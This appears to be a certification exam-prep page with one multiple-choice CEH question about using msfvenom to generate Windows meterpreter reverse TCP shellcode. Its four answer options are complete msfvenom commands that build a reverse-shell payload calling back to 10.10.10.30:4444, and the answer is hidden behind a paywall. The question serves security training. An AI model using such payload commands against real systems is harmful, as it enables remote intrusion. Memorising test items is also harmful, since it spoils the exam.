EC-Council
312-50V13 · Question #268
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?
Sign in or unlock 312-50V13 to reveal the answer and full explanation for question #268. The question stem and answer options stay visible for context.
Submitted by brentm· Mar 6, 2026System Hacking
Question
what is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?
Options
- Amsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
- Bmsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
- Cmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe >
- Dmsfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe >
Unlock 312-50V13 to see the answer
You've previewed enough free 312-50V13 questions. Unlock 312-50V13 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.
Topics
#msfvenom#reverse shell#payload generation#Windows Hacking